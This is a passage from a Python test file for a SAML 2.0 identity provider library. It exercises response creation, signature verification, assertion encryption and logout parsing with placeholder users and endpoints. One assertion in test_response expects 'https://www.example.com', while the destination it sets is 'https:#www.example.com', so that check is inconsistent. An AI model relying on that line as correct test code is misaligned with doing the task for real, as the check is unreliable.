"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": soon,
"user": {
"givenName": "Leo",
"sn": "Laport",
}
}
sp = client.Saml2Client(config_file="server_conf")
sp.users.add_information_about_person(sinfo)
req_id, logout_request = sp.create_logout_request(
name_id=nid, destination="http://localhost:8088/slo",
issuer_entity_id="urn:mace:example.com:saml:roland:idp",
reason="I'm tired of this")
#_ = s_utils.deflate_and_base64_encode("%s" % (logout_request,))
saml_soap = make_soap_enveloped_saml_thingy(logout_request)
self.server.ident.close()
with closing(Server("idp_soap_conf")) as idp:
request = idp.parse_logout_request(saml_soap)
idp.ident.close()
assert request
# ------------------------------------------------------------------------
class TestServer1NonAsciiAva():
def setup_class(self):
self.server = Server("idp_conf")
conf = config.SPConfig()
conf.load_file("server_conf")
self.client = client.Saml2Client(conf)
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id12")
self.ava = {"givenName": ["Dave"], "sn": ["Concepción"],
"mail": ["dave@cnr.mlb.com"], "title": "#13"}
def teardown_class(self):
self.server.close()
def verify_assertion(self, assertion):
assert assertion
assert assertion[0].attribute_statement
ava = get_ava(assertion[0])
assert ava == \
{"givenName": ["Dave"], "sn": [u"Concepción"],
"mail": ["dave@cnr.mlb.com"], "title": ["#13"]}
def verify_encrypted_assertion(self, assertion, decr_text):
self.verify_assertion(assertion)
assert assertion[0].signature is None
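        # Sanity check on the decrypted XML: the Assertion element should sit
        # directly inside EncryptedAssertion and carry an auto-generated
        # encas<N> prefix bound to the SAML 2.0 assertion namespace.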
assert re.search(
r':EncryptedAssertion><encas[0-9]:Assertion ([^ >]* )*xmlns:encas[0-9]="urn:oasis:names:tc:SAML:2.0:assertion"',
decr_text,
)
def verify_advice_assertion(self, resp, decr_text):
assert resp.assertion[0].signature is None
assert resp.assertion[0].advice.encrypted_assertion[0].extension_elements
assertion = extension_elements_to_elements(resp.assertion[0].advice.encrypted_assertion[0].extension_elements,
[saml, samlp])
self.verify_encrypted_assertion(assertion, decr_text)
def test_issuer(self):
issuer = self.server._issuer()
assert isinstance(issuer, saml.Issuer)
assert _eq(issuer.keyswv(), ["text", "format"])
assert issuer.format == saml.NAMEID_FORMAT_ENTITY
assert issuer.text == self.server.config.entityid
def test_assertion(self):
assertion = s_utils.assertion_factory(
subject=factory(
saml.Subject, text="_aaa",
name_id=factory(saml.NameID,
format=saml.NAMEID_FORMAT_TRANSIENT)),
attribute_statement=do_attribute_statement(
{
("", "", "sn"): ("Jeter", ""),
("", "", "givenName"): ("Derek", ""),
}
),
issuer=self.server._issuer(),
)
assert _eq(assertion.keyswv(), ['attribute_statement', 'issuer', 'id',
'subject', 'issue_instant', 'version'])
assert assertion.version == "2.0"
assert assertion.issuer.text == "urn:mace:example.com:saml:roland:idp"
#
assert assertion.attribute_statement
attribute_statement = assertion.attribute_statement
assert len(attribute_statement.attribute) == 2
attr0 = attribute_statement.attribute[0]
attr1 = attribute_statement.attribute[1]
if attr0.attribute_value[0].text == "Derek":
assert attr0.friendly_name == "givenName"
assert attr1.friendly_name == "sn"
assert attr1.attribute_value[0].text == "Jeter"
else:
assert attr1.friendly_name == "givenName"
assert attr1.attribute_value[0].text == "Derek"
assert attr0.friendly_name == "sn"
assert attr0.attribute_value[0].text == "Jeter"
#
subject = assertion.subject
assert _eq(subject.keyswv(), ["text", "name_id"])
assert subject.text == "_aaa"
assert subject.name_id.format == saml.NAMEID_FORMAT_TRANSIENT
def test_response(self):
response = response_factory(
in_response_to="_012345",
destination="https:#www.example.com",
status=s_utils.success_status_factory(),
assertion=s_utils.assertion_factory(
subject=factory(saml.Subject, text="_aaa",
name_id=saml.NAMEID_FORMAT_TRANSIENT),
attribute_statement=do_attribute_statement(
{
("", "", "sn"): ("Jeter", ""),
("", "", "givenName"): ("Derek", ""),
}
),
issuer=self.server._issuer(),
),
issuer=self.server._issuer(),
)
print(response.keyswv())
assert _eq(response.keyswv(), ['destination', 'assertion', 'status',
'in_response_to', 'issue_instant',
'version', 'issuer', 'id'])
assert response.version == "2.0"
assert response.issuer.text == "urn:mace:example.com:saml:roland:idp"
        assert response.destination == "https://www.example.com"
assert response.in_response_to == "_012345"
#
status = response.status
print(status)
assert status.status_code.value == samlp.STATUS_SUCCESS
def test_parse_faulty_request(self):
req_id, authn_request = self.client.create_authn_request(
destination="http://www.example.com", id="id1")
# should raise an error because faulty spentityid
binding = BINDING_HTTP_REDIRECT
htargs = self.client.apply_binding(
binding, "%s" % authn_request, "http://www.example.com", "abcd")
_dict = parse_qs(htargs["headers"][0][1].split('?')[1])
print(_dict)
with raises(OtherError):
self.server.parse_authn_request(_dict["SAMLRequest"][0], binding)
def test_parse_faulty_request_to_err_status(self):
req_id, authn_request = self.client.create_authn_request(
destination="http://www.example.com")
binding = BINDING_HTTP_REDIRECT
htargs = self.client.apply_binding(binding, "%s" % authn_request,
"http://www.example.com", "abcd")
_dict = parse_qs(htargs["headers"][0][1].split('?')[1])
print(_dict)
try:
self.server.parse_authn_request(_dict["SAMLRequest"][0], binding)
status = None
except OtherError as oe:
print(oe.args)
status = s_utils.error_status_factory(oe)
assert status
print(status)
assert _eq(status.keyswv(), ["status_code", "status_message"])
assert status.status_message.text == 'Not destined for me!'
status_code = status.status_code
assert _eq(status_code.keyswv(), ["status_code", "value"])
assert status_code.value == samlp.STATUS_RESPONDER
assert status_code.status_code.value == samlp.STATUS_UNKNOWN_PRINCIPAL
def test_parse_ok_request(self):
req_id, authn_request = self.client.create_authn_request(
message_id="id1",
destination="http://localhost:8088/sso",
nameid_format=saml.NAMEID_FORMAT_TRANSIENT,
)
print(authn_request)
binding = BINDING_HTTP_REDIRECT
htargs = self.client.apply_binding(binding, "%s" % authn_request,
"http://www.example.com", "abcd")
_dict = parse_qs(htargs["headers"][0][1].split('?')[1])
print(_dict)
req = self.server.parse_authn_request(_dict["SAMLRequest"][0], binding)
# returns a dictionary
print(req)
resp_args = self.server.response_args(req.message, [BINDING_HTTP_POST])
assert resp_args["destination"] == "http://lingon.catalogix.se:8087/"
assert resp_args["in_response_to"] == "id1"
name_id_policy = resp_args["name_id_policy"]
assert _eq(name_id_policy.keyswv(), ["format"])
assert name_id_policy.format == saml.NAMEID_FORMAT_TRANSIENT
assert resp_args[
"sp_entity_id"] == "urn:mace:example.com:saml:roland:sp"
def test_sso_response_with_identity(self):
name_id = self.server.ident.transient_nameid(
"https://example.com/sp", "id12")
resp = self.server.create_authn_response(
{
"eduPersonEntitlement": "Short stop",
"sn": "Jeter",
"givenName": "Derek",
"mail": "derek.jeter@nyy.mlb.com",
"title": "The man"
},
"id12", # in_response_to
"http://localhost:8087/", # destination
"https://example.com/sp", # sp_entity_id
name_id=name_id,
authn=AUTHN
)
print(resp.keyswv())
assert _eq(resp.keyswv(), ['status', 'destination', 'assertion',
'in_response_to', 'issue_instant',
'version', 'id', 'issuer'])
assert resp.destination == "http://localhost:8087/"
assert resp.in_response_to == "id12"
assert resp.status
assert resp.status.status_code.value == samlp.STATUS_SUCCESS
assert resp.assertion
assertion = resp.assertion
print(assertion)
assert assertion.authn_statement
assert assertion.conditions
assert assertion.attribute_statement
attribute_statement = assertion.attribute_statement
print(attribute_statement)
assert len(attribute_statement[0].attribute) == 4
# Pick out one attribute
attr = None
for attr in attribute_statement[0].attribute:
if attr.friendly_name == "givenName":
break
assert len(attr.attribute_value) == 1
assert attr.name == "urn:mace:dir:attribute-def:givenName"
assert attr.name_format == "urn:oasis:names:tc:SAML:2.0:attrname-format:basic"
value = attr.attribute_value[0]
assert value.text.strip() == "Derek"
assert value.get_type() == "xs:string"
assert assertion.subject
assert assertion.subject.name_id
assert assertion.subject.subject_confirmation
confirmation = assertion.subject.subject_confirmation[0]
print(confirmation.keyswv())
print(confirmation.subject_confirmation_data)
assert confirmation.subject_confirmation_data.in_response_to == "id12"
def test_sso_response_without_identity(self):
resp = self.server.create_authn_response(
{},
"id12", # in_response_to
"http://localhost:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
userid="USER1",
authn=AUTHN,
release_policy=Policy(),
best_effort=True
)
print(resp.keyswv())
assert _eq(resp.keyswv(), ['status', 'destination', 'in_response_to',
'issue_instant', 'version', 'id', 'issuer',
'assertion'])
assert resp.destination == "http://localhost:8087/"
assert resp.in_response_to == "id12"
assert resp.status
assert resp.status.status_code.value == samlp.STATUS_SUCCESS
assert resp.issuer.text == "urn:mace:example.com:saml:roland:idp"
assert not resp.assertion.attribute_statement
def test_sso_response_specific_instant(self):
_authn = AUTHN.copy()
_authn["authn_instant"] = 1234567890
resp = self.server.create_authn_response(
{},
"id12", # in_response_to
"http://localhost:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
userid="USER1",
authn=_authn,
best_effort=True
)
print(resp.keyswv())
assert _eq(resp.keyswv(), ['status', 'destination', 'in_response_to',
'issue_instant', 'version', 'id', 'issuer',
'assertion'])
authn_statement = resp.assertion.authn_statement[0]
assert authn_statement.authn_instant == '2009-02-13T23:31:30Z'
def test_sso_failure_response(self):
exc = s_utils.MissingValue("eduPersonAffiliation missing")
resp = self.server.create_error_response(
"id12", "http://localhost:8087/", exc)
print(resp.keyswv())
assert _eq(resp.keyswv(), ['status', 'destination', 'in_response_to',
'issue_instant', 'version', 'id', 'issuer'])
assert resp.destination == "http://localhost:8087/"
assert resp.in_response_to == "id12"
assert resp.status
print(resp.status)
assert resp.status.status_code.value == samlp.STATUS_RESPONDER
assert resp.status.status_code.status_code.value == \
samlp.STATUS_REQUEST_UNSUPPORTED
assert resp.status.status_message.text == \
"eduPersonAffiliation missing"
assert resp.issuer.text == "urn:mace:example.com:saml:roland:idp"
assert not resp.assertion
def test_authn_response_0(self):
conf = config.SPConfig()
conf.load_file("server_conf")
self.client = client.Saml2Client(conf)
ava = {"givenName": ["Derek"], "sn": ["Jeter"],
"mail": ["derek@nyy.mlb.com"], "title": "The man"}
npolicy = samlp.NameIDPolicy(format=saml.NAMEID_FORMAT_TRANSIENT,
allow_create="true")
resp_str = "%s" % self.server.create_authn_response(
ava, "id1", "http://local:8087/",
"urn:mace:example.com:saml:roland:sp", npolicy,
"foba0001@example.com", authn=AUTHN)
response = samlp.response_from_string(resp_str)
print(response.keyswv())
assert _eq(response.keyswv(), ['status', 'destination', 'assertion',
'in_response_to', 'issue_instant',
'version', 'issuer', 'id'])
print(response.assertion[0].keyswv())
assert len(response.assertion) == 1
assert _eq(response.assertion[0].keyswv(), ['attribute_statement',
'issue_instant', 'version',
'subject', 'conditions',
'id', 'issuer',
'authn_statement'])
assertion = response.assertion[0]
assert len(assertion.attribute_statement) == 1
astate = assertion.attribute_statement[0]
print(astate)
assert len(astate.attribute) == 4
def test_signed_response(self):
name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id12")
ava = {"givenName": ["Derek"], "sn": ["Jeter"],
"mail": ["derek@nyy.mlb.com"], "title": "The man"}
signed_resp = self.server.create_authn_response(
ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=name_id,
sign_assertion=True
)
print(signed_resp)
assert signed_resp
sresponse = response_from_string(signed_resp)
        # It's the assertions that are signed, not the response per se
assert len(sresponse.assertion) == 1
assertion = sresponse.assertion[0]
        # Since the response is created dynamically I don't know the signature
# value. Just that there should be one
assert assertion.signature.signature_value.text != ""
def test_signed_response_1(self):
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=True,
sign_assertion=True,
)
sresponse = response_from_string(signed_resp)
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:protocol:Response',
node_id=sresponse.id)
assert valid
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
node_id=sresponse.assertion[0].id)
assert valid
self.verify_assertion(sresponse.assertion)
def test_signed_response_2(self):
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=True,
sign_assertion=False,
)
sresponse = response_from_string(signed_resp)
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:protocol:Response',
node_id=sresponse.id)
assert valid
        assert sresponse.assertion[0].signature is None
def test_signed_response_3(self):
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=True,
)
sresponse = response_from_string(signed_resp)
        assert sresponse.signature is None
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
node_id=sresponse.assertion[0].id)
assert valid
self.verify_assertion(sresponse.assertion)
def test_encrypted_signed_response_1(self):
cert_str, cert_key_str = generate_cert()
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=True,
sign_assertion=True,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice=cert_str,
)
sresponse = response_from_string(signed_resp)
valid = self.server.sec.verify_signature(
signed_resp, self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:protocol:Response',
node_id=sresponse.id,
)
assert valid
valid = self.server.sec.verify_signature(
signed_resp, self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
node_id=sresponse.assertion[0].id,
)
assert valid
key_fd = make_temp(cert_key_str, decode=False)
decr_text = self.server.sec.decrypt(signed_resp, key_fd.name)
resp = samlp.response_from_string(decr_text)
assert resp.assertion[0].advice.encrypted_assertion[0].extension_elements
assertion = extension_elements_to_elements(
resp.assertion[0].advice.encrypted_assertion[0].extension_elements,
[saml, samlp])
self.verify_assertion(assertion)
        # PEFIM never signs assertions.
assert assertion[0].signature is None
#valid = self.server.sec.verify_signature(decr_text,
# self.server.config.cert_file,
# node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
# node_id=assertion[0].id)
assert valid
def test_encrypted_signed_response_2(self):
cert_str, cert_key_str = generate_cert()
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=True,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
)
sresponse = response_from_string(signed_resp)
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:protocol:Response',
node_id=sresponse.id)
assert valid
decr_text_old = copy.deepcopy("%s" % signed_resp)
with raises(DecryptError):
decr_text = self.server.sec.decrypt(
signed_resp,
self.client.config.encryption_keypairs[0]["key_file"],
)
decr_text = self.server.sec.decrypt(signed_resp, self.client.config.encryption_keypairs[1]["key_file"])
assert decr_text != decr_text_old
resp = samlp.response_from_string(decr_text)
resp.assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
        assert resp.assertion[0].signature is None
self.verify_assertion(resp.assertion)
def test_encrypted_signed_response_3(self):
cert_str, cert_key_str = generate_cert()
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=False,
encrypt_cert_assertion=cert_str,
)
sresponse = response_from_string(signed_resp)
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:protocol:Response',
node_id=sresponse.id)
assert valid
key_fd = make_temp(cert_key_str, decode=False)
decr_text = self.server.sec.decrypt(signed_resp, key_fd.name)
resp = samlp.response_from_string(decr_text)
resp.assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
valid = self.server.sec.verify_signature(decr_text,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
node_id=resp.assertion[0].id)
assert valid
self.verify_assertion(resp.assertion)
assert 'xmlns:encas' not in decr_text
def test_encrypted_signed_response_4(self):
cert_str, cert_key_str = generate_cert()
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice=cert_str,
)
sresponse = response_from_string(signed_resp)
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:protocol:Response',
node_id=sresponse.id)
assert valid
decr_text = self.server.sec.decrypt(signed_resp, self.client.config.encryption_keypairs[1]["key_file"])
resp = samlp.response_from_string(decr_text)
resp.assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
valid = self.server.sec.verify_signature(decr_text,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
node_id=resp.assertion[0].id)
assert valid
key_fd = make_temp(cert_key_str, decode=False)
decr_text = self.server.sec.decrypt(decr_text, key_fd.name)
resp = samlp.response_from_string(decr_text)
assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
        assertion = extension_elements_to_elements(
            assertion[0].advice.encrypted_assertion[0].extension_elements,
            [saml, samlp])
self.verify_assertion(assertion)
        # PEFIM never signs the assertion in the advice.
assert assertion[0].signature is None
#valid = self.server.sec.verify_signature(decr_text,
# self.server.config.cert_file,
# node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
# node_id=assertion[0].id)
assert valid
def test_encrypted_response_1(self):
cert_str_advice, cert_key_str_advice = generate_cert()
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice=cert_str_advice,
)
_resp = "%s" % _resp
sresponse = response_from_string(_resp)
assert sresponse.signature is None
key_fd = make_temp(cert_key_str_advice, decode=False)
decr_text = self.server.sec.decrypt(_resp, key_fd.name)
resp = samlp.response_from_string(decr_text)
self.verify_advice_assertion(resp, decr_text)
def test_encrypted_response_2(self):
cert_str_advice, cert_key_str_advice = generate_cert()
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice=cert_str_advice,
)
sresponse = response_from_string(_resp)
assert sresponse.signature is None
decr_text_1 = self.server.sec.decrypt(_resp, self.client.config.encryption_keypairs[1]["key_file"])
key_fd = make_temp(cert_key_str_advice, decode=False)
decr_text_2 = self.server.sec.decrypt(decr_text_1, key_fd.name)
resp = samlp.response_from_string(decr_text_2)
resp.assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
self.verify_advice_assertion(resp, decr_text_2)
def test_encrypted_response_3(self):
cert_str_assertion, cert_key_str_assertion = generate_cert()
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypted_advice_attributes=False,
encrypt_cert_assertion=cert_str_assertion
)
sresponse = response_from_string(_resp)
assert sresponse.signature is None
key_fd = make_temp(cert_key_str_assertion, decode=False)
decr_text = self.server.sec.decrypt(_resp, key_fd.name)
resp = samlp.response_from_string(decr_text)
assert resp.encrypted_assertion[0].extension_elements
assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
self.verify_encrypted_assertion(assertion, decr_text)
def test_encrypted_response_4(self):
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypted_advice_attributes=False,
)
sresponse = response_from_string(_resp)
assert sresponse.signature is None
decr_text = self.server.sec.decrypt(_resp, self.client.config.encryption_keypairs[1]["key_file"])
resp = samlp.response_from_string(decr_text)
assert resp.encrypted_assertion[0].extension_elements
assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
self.verify_encrypted_assertion(assertion, decr_text)
def test_encrypted_response_5(self):
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True
)
_resp = "%s" % _resp
sresponse = response_from_string(_resp)
assert sresponse.signature is None
decr_text = self.server.sec.decrypt(_resp, self.client.config.encryption_keypairs[1]["key_file"])
resp = samlp.response_from_string(decr_text)
self.verify_advice_assertion(resp, decr_text)
def test_encrypted_response_6(self):
_server = Server("idp_conf_verify_cert")
cert_str_advice, cert_key_str_advice = generate_cert()
cert_str_assertion, cert_key_str_assertion = generate_cert()
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice=cert_str_advice,
encrypt_cert_assertion=cert_str_assertion
)
sresponse = response_from_string(_resp)
assert sresponse.signature is None
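        # Two certificates were supplied, so decryption happens in two passes:
        # the assertion key opens the outer EncryptedAssertion, then the advice
        # key opens the EncryptedAssertion nested in the advice.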
key_fd1 = make_temp(cert_key_str_assertion, decode=False)
decr_text_1 = _server.sec.decrypt(_resp, key_fd1.name)
key_fd2 = make_temp(cert_key_str_advice, decode=False)
decr_text_2 = _server.sec.decrypt(decr_text_1, key_fd2.name)
resp = samlp.response_from_string(decr_text_2)
resp.assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
self.verify_advice_assertion(resp, decr_text_2)
def test_encrypted_response_7(self):
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True
)
sresponse = response_from_string(_resp)
assert sresponse.signature is None
decr_text_1 = self.server.sec.decrypt(_resp, self.client.config.encryption_keypairs[1]["key_file"])
decr_text_2 = self.server.sec.decrypt(decr_text_1, self.client.config.encryption_keypairs[1]["key_file"])
resp = samlp.response_from_string(decr_text_2)
resp.assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
self.verify_advice_assertion(resp, decr_text_2)
def test_encrypted_response_8(self):
try:
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice="whatever",
encrypt_cert_assertion="whatever"
)
assert False, "Must throw an exception"
except EncryptError as ex:
pass
except Exception as ex:
assert False, "Wrong exception!"
try:
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice="whatever",
)
assert False, "Must throw an exception"
except EncryptError as ex:
pass
except Exception as ex:
assert False, "Wrong exception!"
try:
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypted_advice_attributes=False,
encrypt_cert_assertion="whatever"
)
assert False, "Must throw an exception"
except EncryptError as ex:
pass
except Exception as ex:
assert False, "Wrong exception!"
_server = Server("idp_conf_verify_cert")
try:
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice="whatever",
encrypt_cert_assertion="whatever"
)
assert False, "Must throw an exception"
except CertificateError as ex:
pass
except Exception as ex:
assert False, "Wrong exception!"
try:
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice="whatever",
)
assert False, "Must throw an exception"
except CertificateError as ex:
pass
except Exception as ex:
assert False, "Wrong exception!"
try:
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypted_advice_attributes=False,
encrypt_cert_assertion="whatever"
)
assert False, "Must throw an exception"
except CertificateError as ex:
pass
except Exception as ex:
assert False, "Wrong exception!"
def test_encrypted_response_9(self):
_server = Server("idp_conf_sp_no_encrypt")
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
)
self.verify_assertion(_resp.assertion.advice.assertion)
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True
)
self.verify_assertion(_resp.assertion.advice.assertion)
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypted_advice_attributes=False,
)
self.verify_assertion([_resp.assertion])
def test_slo_http_post(self):
soon = time_util.in_a_while(days=1)
sinfo = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": soon,
"user": {
"givenName": "Leo",
"sn": "Laport",
}
}
self.client.users.add_information_about_person(sinfo)
req_id, logout_request = self.client.create_logout_request(
destination="http://localhost:8088/slop", name_id=nid,
issuer_entity_id="urn:mace:example.com:saml:roland:idp",
reason="I'm tired of this")
intermed = base64.b64encode(str(logout_request).encode('utf-8'))
#saml_soap = make_soap_enveloped_saml_thingy(logout_request)
request = self.server.parse_logout_request(intermed, BINDING_HTTP_POST)
assert request
def test_slo_soap(self):
soon = time_util.in_a_while(days=1)
sinfo = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": soon,
"user": {
"givenName": "Leo",
"sn": "Laport",
}
}
sp = client.Saml2Client(config_file="server_conf")
sp.users.add_information_about_person(sinfo)
req_id, logout_request = sp.create_logout_request(
name_id=nid, destination="http://localhost:8088/slo",
issuer_entity_id="urn:mace:example.com:saml:roland:idp",
reason="I'm tired of this")
#_ = s_utils.deflate_and_base64_encode("%s" % (logout_request,))
saml_soap = make_soap_enveloped_saml_thingy(logout_request)
self.server.ident.close()
with closing(Server("idp_soap_conf")) as idp:
request = idp.parse_logout_request(saml_soap)
idp.ident.close()
assert request
# ------------------------------------------------------------------------
IDENTITY = {"eduPersonAffiliation": ["staff", "member"],
"sn": ["Jeter"], "givenName": ["Derek"],
"mail": ["foo@gmail.com"], "title": "The man"}
class TestServer2():
def setup_class(self):
self.server = Server("restrictive_idp_conf")
def teardown_class(self):
self.server.close()
def test_do_attribute_reponse(self):
aa_policy = self.server.config.getattr("policy", "idp")
print(aa_policy.__dict__)
response = self.server.create_attribute_response(
